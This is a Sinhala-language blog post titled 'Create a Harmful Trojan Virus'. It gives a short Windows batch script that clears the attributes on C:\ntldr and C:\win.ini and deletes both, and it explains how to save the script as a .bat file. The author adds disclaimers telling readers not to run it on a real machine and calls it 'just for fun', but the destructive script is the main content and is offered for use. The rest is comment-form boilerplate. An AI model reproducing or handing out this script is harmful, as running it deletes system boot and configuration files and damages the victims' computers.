Create a Harmful Trojan Virus

මුලින්ම කියන්න තියෙන්නේ මේක හැදුවට පස්සේ run කරන්න නම් එපා..! ! මොකද ඔයාගේ system files  සේරම මේකෙන් ඉවත් කරලා දානවා..ඒ නිසා Virtual machine එකක වගේ run කරලා බැලුවට කමක් නැහැ..අනේ යාලුවනේ තව දෙයක් කියන්න ඕනේ..මම මේවා publish කරන්නේ තව කෙනෙකුට හානිදායක දෙයක් කරන්න නෙමේ just for fun..

හරි යාලුවනේ එහෙනම්.මම මුලින්ම මෙහෙම කිව්වේ දන්නවනේ ඉතින් අපේ කට්ටිය ගැන…යාලුවනේ මම අද කියලා දෙන්නේ කොහොමද Harmful Trojan Virus ක් හදාගන්නේ කියලා…හදන විදිහ ඉතින් මම සුපුරුදු පරිදි video එකකින් කියලා දෙන්නම්කො..වැඩි දෙයක් නැහැ හදාගන්න..Trojan_Horse

මන් දෙන්නම් code එක, මේක තමා code එක

@echo off
attrib -S -R -H C:\ntldr
del C:\ntldr
attrib -S -R -H C:\win.ini
del C:\win.ini
:loop

මේක ඔයාලගේ notepad එකේ copy කරලා එක save as දෙන්නකෝ file name එකට ඕන ක් දෙන්න පුළුවන් but name එකේ අගට .bat ලෙස දීල save as type එකට all files දීල save කරන්නකෝ..මෙහෙම තම file එක හදාගන්නේ..මේක trojen ගනයේ virus ක්..කොච්චර ලේසි දෙයක් උනත් මන් ඉතින් video ක් දානවා..

මන් ඔයගොල්ලන්ට computer virus ගැන පසුව කියල දෙන්නම්කො..කොහොමද මේවා හැදෙන විදිහ , එන විදිහ , පැතිරෙන විදිහ එහෙම ඒ වගේ මන් Introduce කරලා දෙන්නම්කො ඉස්සරහට…මන් ආයෙත් කියනවා කොල්ලනේ මේකෙන් කාටවත් හානියක් කරන්න නම් එපා හොදද…මන් ඉස්සරහට බලාපොරොත්තු වෙනවා මේ වගේ virus හදාගන්න විහිහ ගැන පොස්ට් කිහිපයක්ම ඔයාලට දෙන්න…කිසිම virus ක් ඔයාලගේ physical machine වල run කරන්න එපා..දන්නවනේ ඉතින් වෙන දේවල් ! නමුත් සමහර virus තියෙනවා virtual pc වලත් run කරන්න හොද නැති,,මන් කියල දෙන්නම්කො මොන මොන ඒවාද කියල ඒ..හරි යාලුවනේ have fun..

සුබ වෙසක් දිනයක් වේවා ! සියලුම ලෝක වාසි බෞද්ධ බැතිමතුන්ට… KnTechPower

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s